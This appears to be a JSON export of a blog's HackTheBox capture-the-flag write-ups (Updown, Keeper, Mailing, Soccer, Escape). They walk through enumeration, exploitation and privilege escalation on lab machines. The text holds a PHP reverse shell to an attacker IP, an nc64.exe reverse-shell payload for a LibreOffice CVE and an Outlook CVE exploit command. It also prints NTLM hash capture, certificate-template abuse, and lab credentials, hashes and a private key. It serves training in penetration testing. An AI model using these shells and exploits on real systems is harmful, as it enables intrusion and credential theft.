=\u0026gt; array(\u0026#34;pipe\u0026#34;, \u0026#34;r\u0026#34;), 1 =\u0026gt; array(\u0026#34;pipe\u0026#34;, \u0026#34;w\u0026#34;), 2 =\u0026gt; array(\u0026#34;pipe\u0026#34;, \u0026#34;w\u0026#34;) ); $cmd = \u0026#34;/bin/bash -c \u0026#39;/bin/bash -i \u0026gt;\u0026amp; /dev/tcp/10.10.14.6/443 0\u0026gt;\u0026amp;1\u0026#39;\u0026#34;; $proc = proc_open($cmd, $descspec, $pipes); ?\u0026gt; after uploading this we access the lnk nd use the phar file like this\nhttp://dev.siteisup.htb/?page=phar://uploads/92d9d308ef1ac5fca2cef03d095afd9b/attempt.rob/attempt we are going to escalate liket his }\nbad writeup but anyways gonna escalate with python2 input rce\n__import__(\u0026#39;os\u0026#39;).system(\u0026#39;bash\u0026#39;) Lets add ssh and grab our rsa key\ncd into ssh\nvi developer.id_rsa and copy it there in our home user\ngive it perms with chmod 600\nssh -i developer.id_rsa developer@siteisup.htb\nwe can run easy_install with sudo when we check with sudo-l\nlets check gtfo bins to check if there is anything with sudo\n","date":"14 January 2026","externalUrl":null,"permalink":"/ctf-writeups/updown/","section":"CTF Writeups","summary":"","title":"Updown","type":"ctf-writeups"},{"content":" keeper # Overview # OS: Linux IP: 10.129.229.41 Difficulty: Easy Platform: HackTheBox OSCP: Yes Lists: N/A Summary # Accessed request tracker software with default creds , found credws in one of the queues for ssh access, ssh as user and found a keypass memory dump file, used script to get masterkey fromt he memory dump which later gave us root access when investigating using kpcli.\nLoot # Takeaways Usernames root/password Inorgaard@keeper.htb/Welcome2023! | Inorgaard Helpdesk Agent webmaster@keeper.htb rt@keeper.htb Lise | | Subdomains | tickets.keeper.htb | | | | | rødgrød med fløde |\nEnumeration # nmap scan result 80 Lets visit the subdomain we found and perform dirbusting on it\napparently its using a softwarer called request tracker lets see what it does w chatgpt\nhmmm. so its like a place like github where everythign is organized in requests, and i can see that we can request for admin? like give me admin access thats interesting\n»|« RT 4.4.4+dfsg-2ubuntu1 (Debian) Copyright 1996-2019 Best Practical Solutions, LLC.\napparently its version 4.4.4 aswell\nwe got access using default creds root/password\nin one of the js files we found with dirbusting we find this\nExploitation # ok so on clicking download on this test ticket we are able to view it\nhmm, on editing the user we also see this\nand with those creds we can ssh and grab the user flag\nnow lets esc priv\nlets get the keypass dumper\ngit clone https://github.com/vdohney/keepass-password-dumper\nwe get this as the password which we can now use as the master key rødgrød med fløde\nkpcli --kdb passcodes.kdb\nwe find the putty which we convert into an ssh key using puttygen\n","date":"8 January 2026","externalUrl":null,"permalink":"/ctf-writeups/keeper/","section":"CTF Writeups","summary":"","title":"keeper","type":"ctf-writeups"},{"content":" Mailing # Overview # OS: Windows IP: 10.129.24.210 Difficulty: Easy Platform: HackTheBox OSCP: Yes Lists: N/A Summary # path traversal led to file disclosure that led us to a config file which we got creds from to access the mail server.\nLoot # Takeaways Usernames IT Ruy Alonso Support Maya Bendito maya@mailing.htb CEO Gregory Smith Username+pass AdministratorPassword= 841bb5acfa6779ae432fd7a4e6600ba7 homenetworkingadministrator Mysql 0a9f8ad8bf896b501dde74f08efd7e4c maya m4y4ngs4ri using a cve we senmt a mail that gave us a hash passed the hash to get rce and privesc with libreoffice vulnerability\nEnumeration # nmap scan Port 80 # By testing out a directory from\nhttps://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Directory%20Traversal/Intruder/dotdotpwn.txt\nwe are able to identify LFI because it returned us the .ini file\nVulnerabilities # Exploitation # We will use the LFI we found earlier to read the .ini file for hmailserver and see if we can find something interesting\nlets check ../../../../Progra~2\\hMailServer\\Bin\\MailServer.ini\nboom we have the config file\n[Directories] ProgramFolder=C:\\Program Files (x86)\\hMailServer DatabaseFolder=C:\\Program Files (x86)\\hMailServer\\Database DataFolder=C:\\Program Files (x86)\\hMailServer\\Data LogFolder=C:\\Program Files (x86)\\hMailServer\\Logs TempFolder=C:\\Program Files (x86)\\hMailServer\\Temp EventFolder=C:\\Program Files (x86)\\hMailServer\\Events [GUILanguages] ValidLanguages=english,swedish [Security] AdministratorPassword=841bb5acfa6779ae432fd7a4e6600ba7 [Database] Type=MSSQLCE Username= Password=0a9f8ad8bf896b501dde74f08efd7e4c PasswordEncryption=1 Port=0 Server= Database=hMailServer Internal=1 lets check the creds we got with swaks\nswaks --auth-user 'administrator@mailing.htb' --auth LOGIN --auth-password homenetworkingadministrator --quit-after AUTH --server mailing.htb\ngreat it shows that the creds are valid.\nhmm lets look at any CVE for windows mail\ngit clone https://github.com/xaitax/CVE-2024-21413-Microsoft-Outlook-Remote-Code-Execution-Vulnerability\npython3 CVE-2024-21413.py \u0026ndash;server mailing.htb \u0026ndash;port 587 \u0026ndash;username administrator@mailing.htb \u0026ndash;password homenetworkingadministrator \u0026ndash;sender administrator@mailing.htb \u0026ndash;recipient maya@mailing.htb \u0026ndash;url \u0026ldquo;\\10.10.14.28\\share\\sploit\u0026rdquo; \u0026ndash;subject \u0026ldquo;Check it\u0026rdquo;\nlets run responder to capture it\nsudo responder -I tun0\nthere we captured the hash\nlets crack it with hashcat\nboom we got creds as m4yr4ngsri\nlets try to connect with winrm\nAfter finding a old version of libre office under programs, being used we can start Exploiting libre using this CVE\npython /opt/CVE-2023-2255/CVE-2023-2255.py --cmd 'cmd.exe /c C:\\ProgramData\\nc64.exe -e cmd.exe 10.10.14.6 443' --output exploit.odt\nlets upload the doc to smb share\nsmbclient \u0026lsquo;//10.10.11.14/important documents\u0026rsquo; \u0026ndash;user maya \u0026ndash;password m4y4ngs4ri\n","date":"7 January 2026","externalUrl":null,"permalink":"/ctf-writeups/mailing/","section":"CTF Writeups","summary":"","title":"Mailing","type":"ctf-writeups"},{"content":" Soccer # Overview # OS: Linux IP: 10.129.18.173 Difficulty: Easy Platform: HackTheBox OSCP: Yes Lists: N/A Summary # got shell found exposed site under nginx, found sqli boolean based, used sql map got table with creds, winrm with creds and privesc with doas suid enabled.\nLoot # Credentials TinyFile :- admin/admin@123 Takeaways\nEnumeration # nmap -sCV -A --min-rate 1000 10.129.18.173 Starting Nmap 7.95 ( https://nmap.org ) at 2025-12-30 11:38 EST Nmap scan report for 10.129.18.173 Host is up (0.18s latency). Not shown: 997 closed tcp ports (reset) PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 3072 ad:0d:84:a3:fd:cc:98:a4:78:fe:f9:49:15:da:e1:6d (RSA) | 256 df:d6:a3:9f:68:26:9d:fc:7c:6a:0c:29:e9:61:f0:0c (ECDSA) |_ 256 57:97:56:5d:ef:79:3c:2f:cb:db:35:ff:f1:7c:61:5c (ED25519) 80/tcp open http nginx 1.18.0 (Ubuntu) |_http-server-header: nginx/1.18.0 (Ubuntu) |_http-title: Did not follow redirect to http://soccer.htb/ 9091/tcp open xmltec-xmlmail? | fingerprint-strings: | DNSStatusRequestTCP, DNSVersionBindReqTCP, Help, RPCCheck, SSLSessionReq, drda, informix: | HTTP/1.1 400 Bad Request | Connection: close | GetRequest: | HTTP/1.1 404 Not Found | Content-Security-Policy: default-src \u0026#39;none\u0026#39; | X-Content-Type-Options: nosniff | Content-Type: text/html; charset=utf-8 | Content-Length: 139 | Date: Tue, 30 Dec 2025 16:39:07 GMT | Connection: close | \u0026lt;!DOCTYPE html\u0026gt; | \u0026lt;html lang=\u0026#34;en\u0026#34;\u0026gt; | \u0026lt;head\u0026gt; | \u0026lt;meta charset=\u0026#34;utf-8\u0026#34;\u0026gt; | \u0026lt;title\u0026gt;Error\u0026lt;/title\u0026gt; | \u0026lt;/head\u0026gt; | \u0026lt;body\u0026gt; | \u0026lt;pre\u0026gt;Cannot GET /\u0026lt;/pre\u0026gt; | \u0026lt;/body\u0026gt; | \u0026lt;/html\u0026gt; | HTTPOptions, RTSPRequest: | HTTP/1.1 404 Not Found | Content-Security-Policy: default-src \u0026#39;none\u0026#39; | X-Content-Type-Options: nosniff | Content-Type: text/html; charset=utf-8 | Content-Length: 143 | Date: Tue, 30 Dec 2025 16:39:08 GMT | Connection: close | \u0026lt;!DOCTYPE html\u0026gt; | \u0026lt;html lang=\u0026#34;en\u0026#34;\u0026gt; | \u0026lt;head\u0026gt; | \u0026lt;meta charset=\u0026#34;utf-8\u0026#34;\u0026gt; | \u0026lt;title\u0026gt;Error\u0026lt;/title\u0026gt; | \u0026lt;/head\u0026gt; | \u0026lt;body\u0026gt; | \u0026lt;pre\u0026gt;Cannot OPTIONS /\u0026lt;/pre\u0026gt; | \u0026lt;/body\u0026gt; |_ \u0026lt;/html\u0026gt; 1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service : SF-Port9091-TCP:V=7.95%I=7%D=12/30%Time=69540027%P=x86_64-pc-linux-gnu%r(i SF:nformix,2F,\u0026#34;HTTP/1\\.1\\x20400\\x20Bad\\x20Request\\r\\nConnection:\\x20close\\ SF:r\\n\\r\\n\u0026#34;)%r(drda,2F,\u0026#34;HTTP/1\\.1\\x20400\\x20Bad\\x20Request\\r\\nConnection:\\ SF:x20close\\r\\n\\r\\n\u0026#34;)%r(GetRequest,168,\u0026#34;HTTP/1\\.1\\x20404\\x20Not\\x20Found\\r SF:\\nContent-Security-Policy:\\x20default-src\\x20\u0026#39;none\u0026#39;\\r\\nX-Content-Type-O SF:ptions:\\x20nosniff\\r\\nContent-Type:\\x20text/html;\\x20charset=utf-8\\r\\nC SF:ontent-Length:\\x20139\\r\\nDate:\\x20Tue,\\x2030\\x20Dec\\x202025\\x2016:39:07 SF:\\x20GMT\\r\\nConnection:\\x20close\\r\\n\\r\\n\u0026lt;!DOCTYPE\\x20html\u0026gt;\\n\u0026lt;html\\x20lan SF:g=\\\u0026#34;en\\\u0026#34;\u0026gt;\\n\u0026lt;head\u0026gt;\\n\u0026lt;meta\\x20charset=\\\u0026#34;utf-8\\\u0026#34;\u0026gt;\\n\u0026lt;title\u0026gt;Error\u0026lt;/title\u0026gt;\\n\u0026lt; SF:/head\u0026gt;\\n\u0026lt;body\u0026gt;\\n\u0026lt;pre\u0026gt;Cannot\\x20GET\\x20/\u0026lt;/pre\u0026gt;\\n\u0026lt;/body\u0026gt;\\n\u0026lt;/html\u0026gt;\\n\u0026#34;)%r(H SF:TTPOptions,16C,\u0026#34;HTTP/1\\.1\\x20404\\x20Not\\x20Found\\r\\nContent-Security-Po SF:licy:\\x20default-src\\x20\u0026#39;none\u0026#39;\\r\\nX-Content-Type-Options:\\x20nosniff\\r\\ SF:nContent-Type:\\x20text/html;\\x20charset=utf-8\\r\\nContent-Length:\\x20143 SF:\\r\\nDate:\\x20Tue,\\x2030\\x20Dec\\x202025\\x2016:39:08\\x20GMT\\r\\nConnection SF::\\x20close\\r\\n\\r\\n\u0026lt;!DOCTYPE\\x20html\u0026gt;\\n\u0026lt;html\\x20lang=\\\u0026#34;en\\\u0026#34;\u0026gt;\\n\u0026lt;head\u0026gt;\\n\u0026lt;m SF:eta\\x20charset=\\\u0026#34;utf-8\\\u0026#34;\u0026gt;\\n\u0026lt;title\u0026gt;Error\u0026lt;/title\u0026gt;\\n\u0026lt;/head\u0026gt;\\n\u0026lt;body\u0026gt;\\n\u0026lt;pre\u0026gt; SF:Cannot\\x20OPTIONS\\x20/\u0026lt;/pre\u0026gt;\\n\u0026lt;/body\u0026gt;\\n\u0026lt;/html\u0026gt;\\n\u0026#34;)%r(RTSPRequest,16C,\u0026#34;H SF:TTP/1\\.1\\x20404\\x20Not\\x20Found\\r\\nContent-Security-Policy:\\x20default- SF:src\\x20\u0026#39;none\u0026#39;\\r\\nX-Content-Type-Options:\\x20nosniff\\r\\nContent-Type:\\x2 SF:0text/html;\\x20charset=utf-8\\r\\nContent-Length:\\x20143\\r\\nDate:\\x20Tue, SF:\\x2030\\x20Dec\\x202025\\x2016:39:08\\x20GMT\\r\\nConnection:\\x20close\\r\\n\\r\\ SF:n\u0026lt;!DOCTYPE\\x20html\u0026gt;\\n\u0026lt;html\\x20lang=\\\u0026#34;en\\\u0026#34;\u0026gt;\\n\u0026lt;head\u0026gt;\\n\u0026lt;meta\\x20charset=\\\u0026#34; SF:utf-8\\\u0026#34;\u0026gt;\\n\u0026lt;title\u0026gt;Error\u0026lt;/title\u0026gt;\\n\u0026lt;/head\u0026gt;\\n\u0026lt;body\u0026gt;\\n\u0026lt;pre\u0026gt;Cannot\\x20OPTIONS SF:\\x20/\u0026lt;/pre\u0026gt;\\n\u0026lt;/body\u0026gt;\\n\u0026lt;/html\u0026gt;\\n\u0026#34;)%r(RPCCheck,2F,\u0026#34;HTTP/1\\.1\\x20400\\x20Ba SF:d\\x20Request\\r\\nConnection:\\x20close\\r\\n\\r\\n\u0026#34;)%r(DNSVersionBindReqTCP,2 SF:F,\u0026#34;HTTP/1\\.1\\x20400\\x20Bad\\x20Request\\r\\nConnection:\\x20close\\r\\n\\r\\n\u0026#34;) SF:%r(DNSStatusRequestTCP,2F,\u0026#34;HTTP/1\\.1\\x20400\\x20Bad\\x20Request\\r\\nConnec SF:tion:\\x20close\\r\\n\\r\\n\u0026#34;)%r(Help,2F,\u0026#34;HTTP/1\\.1\\x20400\\x20Bad\\x20Request\\ SF:r\\nConnection:\\x20close\\r\\n\\r\\n\u0026#34;)%r(SSLSessionReq,2F,\u0026#34;HTTP/1\\.1\\x20400\\ SF:x20Bad\\x20Request\\r\\nConnection:\\x20close\\r\\n\\r\\n\u0026#34;); Device type: general purpose|router Running: Linux 4.X|5.X, MikroTik RouterOS 7.X OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5 cpe:/o:mikrotik:routeros:7 cpe:/o:linux:linux_kernel:5.6.3 OS details: Linux 4.15 - 5.19, MikroTik RouterOS 7.2 - 7.5 (Linux 5.6.3) Network Distance: 2 hops Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel TRACEROUTE (using port 1025/tcp) HOP RTT ADDRESS 1 184.28 ms 10.10.14.1 2 188.50 ms 10.129.18.173 OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 35.08 seconds Found this with dirbuster\nVulnerabilties Tiny file manager\nExploitation # so the default creds worked admin/admin@123\nSeems like the files are being saved in this path\nhttps://febin0x4e4a.wordpress.com/2022/01/23/tiny-file-manager-authenticated-rce/\nWe are meeting an error where we are not allowd to write in the specified folder\nlets try path traversal acco. to the blog we found\nby giving a rubbish url we get the file path where the stuff is being stored\n/var/www/html/tiny/tinyfilemanager.php\nwe were able to upload it in the /uploads/ directory and on viewing it we get our php shell\nfound this soccer player but we dont have perms to view the flag wha\nhmm lets look around\nafter discovering the subdomain soc-player.soccer.htb under site-enabled directory we add it to our vi /etc/hosts and have this page with us\nright off the bat i notice the menu bars\nthere is this portal that we come accross\nand under check we find this\ni think its cross checking the tickets with a backend for validity, lets try some sql payload\napparently it is vulnerable so we exploit it with sqlmap and get the creds for player\nlets ssh as player\n","date":"30 December 2025","externalUrl":null,"permalink":"/ctf-writeups/soccer/","section":"CTF Writeups","summary":"","title":"Soccer","type":"ctf-writeups"},{"content":" [AD] Escape # Overview # OS: Windows IP: 10.129.228.253 Difficulty: Medium Platform: HackTheBox OSCP: Yes Lists: N/A Summary # Got Access via leaked user creds, ntlm poisioning of service account hash, priv esc with a vuln certificate template.\nLoot # Rough Usernames Brandon, Tom, Ryan Credentials PublicUser:GuestUserCantWrite1 Takeaways\nsequel\\sql_svc:REGGIE1234ronnie\nsequel.htb\\Ryan.Cooper:NuclearMosquito3\nadministrator:A52F78E4C751E5F5E17E1E9F3E58F4EE | |\nEnumeration # nmap Starting Nmap 7.95 ( https://nmap.org ) at 2025-12-25 13:36 EST Nmap scan report for 10.129.228.253 Host is up (0.19s latency). Not shown: 987 filtered tcp ports (no-response) PORT STATE SERVICE VERSION 53/tcp open domain Simple DNS Plus 88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-12-26 02:37:16Z) 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name) | ssl-cert: Subject: | Subject Alternative Name: DNS:dc.sequel.htb, DNS:sequel.htb, DNS:sequel | Not valid before: 2024-01-18T23:03:57 |_Not valid after: 2074-01-05T23:03:57 |_ssl-date: 2025-12-26T02:38:45+00:00; +7h59m59s from scanner time. 445/tcp open microsoft-ds? 464/tcp open kpasswd5? 593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name) | ssl-cert: Subject: | Subject Alternative Name: DNS:dc.sequel.htb, DNS:sequel.htb, DNS:sequel | Not valid before: 2024-01-18T23:03:57 |_Not valid after: 2074-01-05T23:03:57 |_ssl-date: 2025-12-26T02:38:45+00:00; +8h00m00s from scanner time. 1433/tcp open ms-sql-s Microsoft SQL Server 2019 15.00.2000.00; RTM | ms-sql-info: | 10.129.228.253:1433: | Version: | name: Microsoft SQL Server 2019 RTM | number: 15.00.2000.00 | Product: Microsoft SQL Server 2019 | Service pack level: RTM | Post-SP patches applied: false |_ TCP port: 1433 | ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback | Not valid before: 2025-12-26T02:28:16 |_Not valid after: 2055-12-26T02:28:16 | ms-sql-ntlm-info: | 10.129.228.253:1433: | Target_Name: sequel | NetBIOS_Domain_Name: sequel | NetBIOS_Computer_Name: DC | DNS_Domain_Name: sequel.htb | DNS_Computer_Name: dc.sequel.htb | DNS_Tree_Name: sequel.htb |_ Product_Version: 10.0.17763 |_ssl-date: 2025-12-26T02:38:45+00:00; +7h59m59s from scanner time. 3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name) |_ssl-date: 2025-12-26T02:38:45+00:00; +7h59m59s from scanner time. | ssl-cert: Subject: | Subject Alternative Name: DNS:dc.sequel.htb, DNS:sequel.htb, DNS:sequel | Not valid before: 2024-01-18T23:03:57 |_Not valid after: 2074-01-05T23:03:57 3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name) | ssl-cert: Subject: | Subject Alternative Name: DNS:dc.sequel.htb, DNS:sequel.htb, DNS:sequel | Not valid before: 2024-01-18T23:03:57 |_Not valid after: 2074-01-05T23:03:57 |_ssl-date: 2025-12-26T02:38:45+00:00; +8h00m00s from scanner time. 5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) |_http-title: Not Found |_http-server-header: Microsoft-HTTPAPI/2.0 Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port Device type: general purpose Running (JUST GUESSING): Microsoft Windows 2019|10 (97%) OS CPE: cpe:/o:microsoft:windows_server_2019 cpe:/o:microsoft:windows_10 Aggressive OS guesses: Windows Server 2019 (97%), Microsoft Windows 10 1903 - 21H1 (91%) No exact OS matches for host (test conditions non-ideal). Network Distance: 2 hops Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows Host script results: | smb2-time: | date: 2025-12-26T02:38:04 |_ start_date: N/A |_clock-skew: mean: 7h59m59s, deviation: 0s, median: 7h59m58s | smb2-security-mode: | 3:1:1: |_ Message signing enabled and required TRACEROUTE (using port 445/tcp) HOP RTT ADDRESS 1 192.44 ms 10.10.14.1 2 192.55 ms 10.129.228.253 OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 109.19 seconds ssl Connecting to 10.129.228.253 CONNECTED(00000003) depth=0 verify error:num=20:unable to get local issuer certificate verify return:1 depth=0 verify error:num=21:unable to verify the first certificate verify return:1 depth=0 verify return:1 Certificate chain 0 s: i:DC=htb, DC=sequel, CN=sequel-DC-CA a:PKEY: RSA, 2048 (bit); sigalg: sha256WithRSAEncryption v:NotBefore: Jan 18 23:03:57 2024 GMT; NotAfter: Jan 5 23:03:57 2074 GMT Server certificate -----BEGIN CERTIFICATE----- MIIFkTCCBHmgAwIBAgITHgAAAAsyZYRdLEkTIgAAAAAACzANBgkqhkiG9w0BAQsF ADBEMRMwEQYKCZImiZPyLGQBGRYDaHRiMRYwFAYKCZImiZPyLGQBGRYGc2VxdWVs MRUwEwYDVQQDEwxzZXF1ZWwtREMtQ0EwIBcNMjQwMTE4MjMwMzU3WhgPMjA3NDAx MDUyMzAzNTdaMAAwggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIBAQCvfUDG vZbf6oLv67FXEoeqi+VUDMwFcCWGOpwAlEvMCRhMa2Jqx6nVSl+7URU0rF43c58A kAFbwX9E5B4Me4ZDkqkHV5nBBkHEPdDP4ZlYsjAmVrz7bHAzp3coDgF9UKv9S4j8 g9P8MPaOdxTRR6dwkhVWdIDvIevjeg7oWTawG7MFEX4b7BEwL/uNRYZtyFHrfmzP BL5MovrBbZzU4AnggnvpeiLNdenK9Xcp2IIDr8A7h7uFuQ+3pCbXL9El/vEgzxAj rsUhf2e6nxNAWrNZSFXLHREt9uFkhTWU26Zoa675Vjq0XNy7J+rXAZiU5q3eD4Kq /SiN+ZDAwWJ22XGJAgMBAAGjggK8MIICuDA4BgkrBgEEAYI3FQcEKzApBiErBgEE AYI3FQiHq/N2hdymVof9lTWDv8NZg4nKNYF3ASECAW4CAQIwMgYDVR0lBCswKQYI KwYBBQUHAwIGCCsGAQUFBwMBBgorBgEEAYI3FAICBgcrBgEFAgMFMA4GA1UdDwEB /wQEAwIFoDBABgkrBgEEAYI3FQoEMzAxMAoGCCsGAQUFBwMCMAoGCCsGAQUFBwMB MAwGCisGAQQBgjcUAgIwCQYHKwYBBQIDBTAdBgNVHQ4EFgQUCVbgZp4lOmGws1z7 bP3InfTiHiMwHwYDVR0jBBgwFoAUYp8yo6DwOCDUYMDNbcX6UTBewxUwgcQGA1Ud HwSBvDCBuTCBtqCBs6CBsIaBrWxkYXA6Ly8vQ049c2VxdWVsLURDLUNBLENOPWRj LENOPUNEUCxDTj1QdWJsaWMlMjBLZXklMjBTZXJ2aWNlcyxDTj1TZXJ2aWNlcyxD Tj1Db25maWd1cmF0aW9uLERDPXNlcXVlbCxEQz1odGI/Y2VydGlmaWNhdGVSZXZv Y2F0aW9uTGlzdD9iYXNlP29iamVjdENsYXNzPWNSTERpc3RyaWJ1dGlvblBvaW50 MIG9BggrBgEFBQcBAQSBsDCBrTCBqgYIKwYBBQUHMAKGgZ1sZGFwOi8vL0NOPXNl cXVlbC1EQy1DQSxDTj1BSUEsQ049UHVibGljJTIwS2V5JTIwU2VydmljZXMsQ049 U2VydmljZXMsQ049Q29uZmlndXJhdGlvbixEQz1zZXF1ZWwsREM9aHRiP2NBQ2Vy dGlmaWNhdGU/YmFzZT9vYmplY3RDbGFzcz1jZXJ0aWZpY2F0aW9uQXV0aG9yaXR5 MC8GA1UdEQEB/wQlMCOCDWRjLnNlcXVlbC5odGKCCnNlcXVlbC5odGKCBnNlcXVl bDANBgkqhkiG9w0BAQsFAAOCAQEAK2aJVbODF+3XQ85GflrcPthxILDslZoJff13 ULw9IQRwFbr5wV/usQR8WXfp4FGWB7g6F3w4vOo8Wnm0eTcQM+N2Ry3aEWiv9SG8 /Vk18Z1sSU2hzlTdZbVJWgZwCyPvYoV02uPkP12f+Z9groRTtOEBq0AgdMDc5hZ/ A8Ikn9UuctvkX6qgw+ofyVveIqsE0GL6DCDGw6iUmXIgVJk5fgQnfyQquqnmhVnA 8NoXXuh0ioTHmCqYrdtIcB8KC4nS70p3ef2F2fTNejqtw46M04VZQw/67Y+83hI5 I1fLChrYFtPk3g5JHaHyIE9aY3EUmU3EH2SKhRSi5R6GJBctmw== -----END CERTIFICATE----- subject= issuer=DC=htb, DC=sequel, CN=sequel-DC-CA No client certificate CA names sent Client Certificate Types: RSA sign, DSA sign, ECDSA sign Requested Signature Algorithms: RSA+SHA256:RSA+SHA384:RSA+SHA1:ECDSA+SHA256:ECDSA+SHA384:ECDSA+SHA1:DSA+SHA1:RSA+SHA512:ECDSA+SHA512 Shared Requested Signature Algorithms: RSA+SHA256:RSA+SHA384:RSA+SHA1:ECDSA+SHA256:ECDSA+SHA384:ECDSA+SHA1:DSA+SHA1:RSA+SHA512:ECDSA+SHA512 Peer signing digest: SHA256 Peer signature type: rsa_pkcs1_sha256 Peer Temp Key: ECDH, secp384r1, 384 bits SSL handshake has read 1979 bytes and written 1849 bytes Verification error: unable to verify the first certificate New, TLSv1.2, Cipher is ECDHE-RSA-AES256-GCM-SHA384 Protocol: TLSv1.2 Server public key is 2048 bit Secure Renegotiation IS supported Compression: NONE Expansion: NONE No ALPN negotiated SSL-Session: Protocol : TLSv1.2 Cipher : ECDHE-RSA-AES256-GCM-SHA384 Session-ID: 4D2800008BDCD71818F7B113163933B092C8E59CAB994B5994CE3EA667FE9534 Session-ID-ctx: Master-Key: 795202876F2CD0C474ACB69F447AE7D1E481E249E96F7313C6E3AC60A5D7E31066A0410CDB79416BE5D7CC1822DD6F2E PSK identity: None PSK identity hint: None SRP username: None Start Time: 1766689379 Timeout : 7200 (sec) Verify return code: 21 (unable to verify the first certificate) Extended master secret: yes smb SQL server Lets try to do ntlm poisioning where we will try to get the server to connect to us, which will give us the identity that we will try and crack\nWe capture this\n[+] Listening for events... [SMB] NTLMv2-SSP Client : 10.129.228.253 [SMB] NTLMv2-SSP Username : sequel\\sql_svc [SMB] NTLMv2-SSP Hash : sql_svc::sequel:b7114adaff3f6874:AE56E5B5586110E928824C4A231B6E2A:010100000000000080923BF6B275DC01595E6647EC95B6F80000000002000800550056003800340001001E00570049004E002D00310053004D004D0048004E0037005A0043005200510004003400570049004E002D00310053004D004D0048004E0037005A004300520051002E0055005600380034002E004C004F00430041004C000300140055005600380034002E004C004F00430041004C000500140055005600380034002E004C004F00430041004C000700080080923BF6B275DC010600040002000000080030003000000000000000000000000030000060EE7AF5E672E9B3997DD99397B112593890FA2639AC35A2DDBFCCB3DAE08ABB0A001000000000000000000000000000000000000900200063006900660073002F00310030002E00310030002E00310034002E00320038000000000000000000 on cracking with hashcat\nVulnerabilities # Exploitation # now that we got the user account creds that was running the sql service, lets try to get in through it with evil winrm\nwe find this in the sqlserver path\nLets try getting in with these creds and then grabbing the user flag\nPriv-Esc Lets start off with getting Bloodhound on\nnow lets check our applocker policies\nTells us that there are no rules being enforced and we can create a new machine\nidt we can dump creds\ndamn what about privesc check\nnothing useful\nlets check certify\nit gives us this which is a vulnerable template\nlets request a cert now\n./cert.exe request /ca:dc.sequel.htb\\sequel-DC-CA /template:UserAuthentication /altname:administrator\n[*] cert.pem : -----BEGIN RSA PRIVATE KEY----- MIIEogIBAAKCAQEAmsMuQLppjYVgw4//mpj/P/Q+0iISV1slIWtyn2pg+dtyU3NE gSYqlvxcy68tOFbT38N4iFRaeLjYgyYZncKxhkIMbUThTCMOMdQm87mNdPwuP5NB NZdP7TinW3Yj61ahN8c61XxzNr6kjVo2440wjVpFCFkChbyi3E0Xd2YeqQ4bhwqi m6CNn+RzpUgw5+nE5DsCTyY/jC80ak2BheI7Dj1PACsEKKumVqU1ILn+gjpRSZvs zD/BZMg6nbmrNhe88r/ws4ToyLQqGUCNx0tey37MVrToN4pELJ44CjJf16g9qvwR qEcm6VZacro+Xa5ZMqmJo74MVsYsZT5AP/0uLQIDAQABAoIBADluz35j74H+im9o xAGaX7dbK+kNjeLvRzNEza/NaZmvz5iagUSwZkPL+Z/5LX3n8w7qWpO1QjHk3yyk egMq2nipkDUIx9dadw0U3zO5m35bi8o6GowJ0DaHvMvbZu8SIhgyDmplmdgqHaT7 Yr1Fi0wZwN6dMatx2rqIvXmo4x33M4l+7o/b7JHMTNj4xzoO1u10mvK6pxXYp0j2 PWxJA2einj231nDt0CQZUr4BxUnIbbY1pw4CbvSjS1cs3cPUOWagrWUvI+hOdZmV T25dsGd0BJX1DWtbjyJndnj8bMgsu5Z/0bNt/xnfmYxnh74LhXhm7wFwyKh3tEMA xw//4N0CgYEAy0HUvkApkB49269QXe57ubP9xP9ZQglaxKnMCWmkiyLgy2K9EWIN fpHoDa0p/GIfkNoPT/4TL1wY37MbMlPrMjk/Z8q9+mhsCOeAwfxAd3GZz8zGbV18 tQzQfJjaZqRcL+kuOVGXh0p16HuP2ysDEBlaNrRPjgs4PY3pH1VKk/MCgYEAwuvk ufCvZNo86t7N9elVyB1JehL50mxhgMbAqZum9bWt3ASwBIOxCb01Pt43RaHxuiUj Ub+01sG00XxQ7bwJ8N6NaGAPr2JviiBchAqmNHu7Em7SGSAKL4SdQFPJvVgJmzjz 6kL2tbHbqXfq11hRQJLeeMA29+CAnCyHU2lrXV8CgYAHQqm7xgT2De59u2xufodS 4dgNwmVI05a3ca1FJM3o3m0TNsq0JUGAJOwaGPZn+oVQIknrvJKo3WxSCU7OZGsB V0Qpi/dvS22Yf9R8mWsgGSG6Z4ErBOzgdr23xan/gp18ZKLvDzgPcBx4GnnQBWBN oeo0DArPcx0mLbyHDv/j+wKBgArLHy5AqqWuBAOJdOQyGILtRD1TQawqPjfwSYja yqL+fXMae1i0piAA7yrdCTh84DLLjaogMHZX4ZhcBuszJ2XEHRZzg0rV65E9e4IA SPXNCC3cHxwvDwFUmZSPTzOB5X5H6BHHxXuILr6ymjl0dYNa3qDXG/Qb5WNAf/nZ c42HAoGAL3lc7J4mSTf47W0y/PI7WSqrjYVxUKUDL8+x+jjoB2mRZtgKH2PEklI7 5C2dnQ2BE/e/LJVkUfgs2i3Q/qmR6pMO6pnevV4DV8NwU7OKWZ8zWwj4KEDVR/Sq 